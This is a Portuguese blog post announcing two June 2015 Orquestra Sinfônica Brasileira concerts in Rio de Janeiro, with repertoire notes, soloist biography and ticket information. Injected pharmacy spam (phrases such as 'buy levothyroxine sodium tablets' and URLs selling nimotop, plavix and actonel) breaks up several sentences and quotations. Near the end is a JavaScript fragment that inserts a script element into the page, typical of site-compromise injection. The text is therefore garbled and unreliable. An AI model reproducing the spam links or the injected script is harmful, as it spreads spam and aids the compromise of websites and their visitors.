Música sinfônicaProgramaçãoRio de Janeiro

OSB valoriza prata da casa

Orquestra celebra seus músicos e o Rio de Janeiro com apresentações na Sala Cecília Meireles e na Cidade das Artes.

 

Nos próximos dias 19 e 20 de junho, a Orquestra Sinfônica Brasileira (OSB) realiza apresentações pelas séries OSB na Sala e Concertos da Juventude de Câmara, exaltando a excelência e qualificação de seus músicos Felipe Destéfano, fagote solista do conjunto, e Ângelo Martins, violinista.

No dia 19, às 20h, na Sala Cecília Meireles, a Orquestra, sob a regência do maestro titular, Roberto Minczuk, recebe Destéfano como solista principal para interpretar o buy levothyroxine sodium tablets Concerto para Fagote, de Mozart. Na récita, o público ainda confere a estreia no Rio de Janeiro de Variações Temporais, do carioca Ronaldo Miranda, em uma homenagem ao aniversário da cidade, e a Sinfonia n. 9, de Schubert. Os ingressos custam R$ 40 e estão à venda na bilheteria da Sala.

No dia seguinte (20), às 16h, no Teatro de Câmara da Cidade das Artes, ocorre a segunda apresentação da série Concertos da Juventude de Câmara. Destéfano interpreta novamente a obra de Mozart, sob regência de Minczuk, e os músicos da orquestra apresentam a obra Le Parole Non Dette, composta pelo violinista Martins. O concerto, de perfil didático e informal, direcionado principalmente aos jovens, terá apresentação do professor Eduardo Lakschevitz, doutor em Música pela UniRio. Os ingressos, vendidos a R$ 1, estarão disponíveis uma hora antes do concerto na bilheteria da Cidade das Artes.

Para esta temporada 2015 da OSB serão 18 Concertos da Juventude, divididos entre a Cidade das Artes (13 apresentações, incluindo a versão de câmara) e Theatro Municipal (cinco apresentações). Os ingressos são vendidos a preços populares de R$ 1, na Cidade das Artes, e R$ 10 no Theatro Municipal.

Repertório

Para abrir a récita na Sala, a OSB faz a estreia no Rio de Janeiro da obra Variações Temporais – Beethoven revisitado. A peça escrita por Miranda está na programação 2015 da OSB, entre várias obras de compositores cariocas escolhidas para comemorar os 450 anos do Rio de Janeiro. Composta no ano passado, a música foi encomendada pela Fundação Orquestra Sinfônica do Estado de São Paulo e tem como propósito revisar o repertório de Beethoven, principalmente a Sinfonia n. 6, conhecida como Pastoral. A composição de Miranda dialoga também com a música de câmara do compositor alemão, especialmente com as sonatas Aurora, Primavera e Tempestade. Variações Temporais http://www.tarynasurteespr.com/where-to-buy-nimotop/ estreou em julho passado, na Sala São Paulo, pela Osesp.

Fagotista solista da Orquestra, Felipe Destéfano sobe ao palco para interpretar o primeiro concerto para instrumento de sopro e o único para fagote, composto por Mozart em sua carreira. A peça foi criada em 1774, em Salzburg, quando o compositor tinha apenas 18 anos, e é considerada a mais estudada e interpretada de todo o conjunto de obras para o instrumento. Para encerrar a apresentação, Minczuk e os músicos tocam a Sinfonia n. 9, de Schubert, conhecida como A Grande http://diniharie.mhs.narotama.ac.id/2018/02/02/how-much-does-plavix-cost-at-walmart/ . Composta em 1828, ano em que Schubert morreu, o compositor não chegou a escutá-la e nem a ver a estreia da obra. A première só ocorreu em 1839, pela Gewandhaus de Leipzig, sob regência de Felix Mendelssohn. O apelido A Grande inicialmente foi dado para diferenciá-la da Sinfonia n. 6 do compositor, escrita igualmente em dó maior, porém com menor tempo de duração e com menor complexidade. Mas o termo, com o tempo, também passou a fazer referência à grandiosidade da temática.

Para a récita da série Concertos da Juventude de Câmara, na Cidade das Artes, além do solo de Destéfano com a peça de Mozart, a OSB interpreta Le Parole Non Dette, música composta em 2014 pelo violinista da Orquestra, Ângelo Martins para o Concurso Internacional de Composição de Sofia, na Bulgária. A obra conquistou nota máxima no concurso e levou o principal prêmio, juntamente com outra composição igualmente premiada. A inspiração, segundo seu autor, veio da execução do filósofo e teólogo italiano do século 16, Giordano Bruno. Ele foi acusado de heresia por inquisidores do Santo Ofício por disseminar uma forma de pensamento conhecida como Teosofia, indo de encontro às ideias da Igreja naquele período.

“Bruno ficou encarcerado por sete anos, foi condenado à fogueira santa, e lhe foi negado o direito de proferir suas últimas palavras. Apesar desta tragédia ter ocorrido no século 16, a temática é bem atual. Em suma, a obra é uma espécie de elegia a todos os ‘bravos’ que lutaram até as últimas consequências para promover um combate contra a ignorância, o fanatismo, seja religioso ou político, visando o bem maior coletivo, a liberdade de pensamento e expressão em todas as esferas. Esta, infelizmente, é a sociedade, que silencia quem luta pra promover reflexão dos que a integram” Pills Cheap , reflete Martins.

Na apresentação, o professor Lakschevitz desenvolverá uma conversa informal com o público, fazendo pausas entre as obras, falando dos compositores e das formações de câmara propostas em cada espetáculo.

“Com este projeto, queremos atingir aquele público que normalmente não trabalha e não tem tanto contato com a música de concerto. Música erudita tem uma áurea de elitista, anacrônica e é bacana desmontar esse ritual. A roupa, o jeito de entrar, a seriedade, o palco, o momento em que você pode bater palma, isto tudo, às vezes, é mais forte na cabeça das pessoas do que a própria música em si. O que queremos no Juventude de Câmara é conversar com o público e fazê-lo entender a atualidade da música de concerto” http://www.repress.co/where-can-i-buy-actonel/ , explica Lakschevitz.

Sobre Felipe Destéfano

Fagote solo da OSB, o chileno Destéfano participou de importantes conjuntos na Europa e na América do Sul, tendo sido nomeado, em 1993, primeiro fagote da Orquestra Acadêmica de Berlim. Foi bolsista no Festival de Campos do Jordão em 1996 e atuou como solista com a Filarmônica de Santiago nas sinfonias concertantes de Mozart e Haydn em 2000 e 2001. Em 2010, apresentou o concerto As cinco árvores sagradas, de John Williams, com a Sinfônica do Chile. É membro fundador do Quinteto de Sopros Arrau, de Santiago.

 

SERVIÇO:

 

Orquestra Sinfônica Brasileira

Roberto Minczuk, regência

Felipe Destéfano, fagote online

 

Série “OSB na Sala” Buy

19 de junho, sexta-feira, às 20h

Sala Cecília Meireles (Largo da Lapa, 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

 

Ingressos a R$ 40, com desconto de 50% para maiores de 60 anos, menores de 21 anos, estudantes, pessoas com necessidades especiais e professores da rede municipal de ensino

À venda na bilheteria da Sala, de segunda a sexta, das 12h às 18h, sábados e domingos, quando houver concerto, uma hora antes do início do espetáculo. Os ingressos também são vendidos pelo site Ingresso.com ou pelo telefone 21 4003-2330, diariamente, das 9h às 21h

 

Programa:

R. Miranda – Variações Temporais

W. A. Mozart – Concerto para fagote em si bemol maior, KV 191

F. Schubert – Sinfonia n. 9 em dó maior, D.944 – A Grande

 

Série “Concertos da Juventude de Câmara”

20 de junho, sábado, às 16h

Teatro de Câmara da Cidade das Artes (Av. das Américas 5.300, Barra da Tijuca – Rio de Janeiro. Tel.: 21 4003-1212)

 

Programa:

A. Martins – Le Parole Non Dette

W. A. Mozart – Concerto para fagote em si bemol maior, KV 191

 

Ingressos a R$ 1, disponíveis a partir de uma hora antes do início do espetáculo na bilheteria da Cidade das Artes

Estacionamento: R$ 10 por veículo

d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.